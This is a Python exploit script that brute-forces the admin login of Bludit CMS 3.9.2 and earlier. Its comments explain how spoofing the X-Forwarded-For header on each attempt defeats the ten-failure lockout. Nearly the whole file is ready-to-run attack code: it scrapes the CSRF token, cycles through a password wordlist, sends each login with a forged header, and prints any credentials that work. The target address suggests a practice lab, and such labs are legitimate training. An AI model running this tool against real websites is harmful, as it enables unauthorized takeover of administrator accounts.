#!/usr/bin/env python3
#---------------------
#Created by Prescott Rowe
##Bludit CMS Versions 3.9.2 and prior are vulnerable bruteforce as the lockout mechinism is easily avoided. It attepts to 
##lock the user out if they fail to authenticate 10 times in a row. The code for this is held within the bl-kernel/security.class.php 
##file, there is a function named getUserIp which attempts to determine the true IP address of the end user by trusting the 
##X-Forwarded-For and Client-IP HTTP headers. By spoofing these fields every 9th or more times we can evaid lockout. Spoofed 
##fields also do not need to match and regex parsing, any text will work. Infact to stop from locking other users out it is 
##recomended to use nonsense words (like passwords) to spoof the fields.
#----------------------
import re
import requests
import sys

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'admin'
wordlist = '/mylist.txt'
f = open(wordlist, "r")

for password in f:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    password=str.rstrip(password)
    sys.stdout.write("[*] Trying: "+ password + "         ")
    sys.stdout.write("\r")
    sys.stdout.flush()
#The X-Forwarded-for section is where in a normall request we would be passing our IP to the cms. Then when we have 10 failed logins we get added to the temproary blacklist. 
#But testing shows that anything can be put here and it will log it without checking validity. In this case we just use our password as our random unique value. 
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break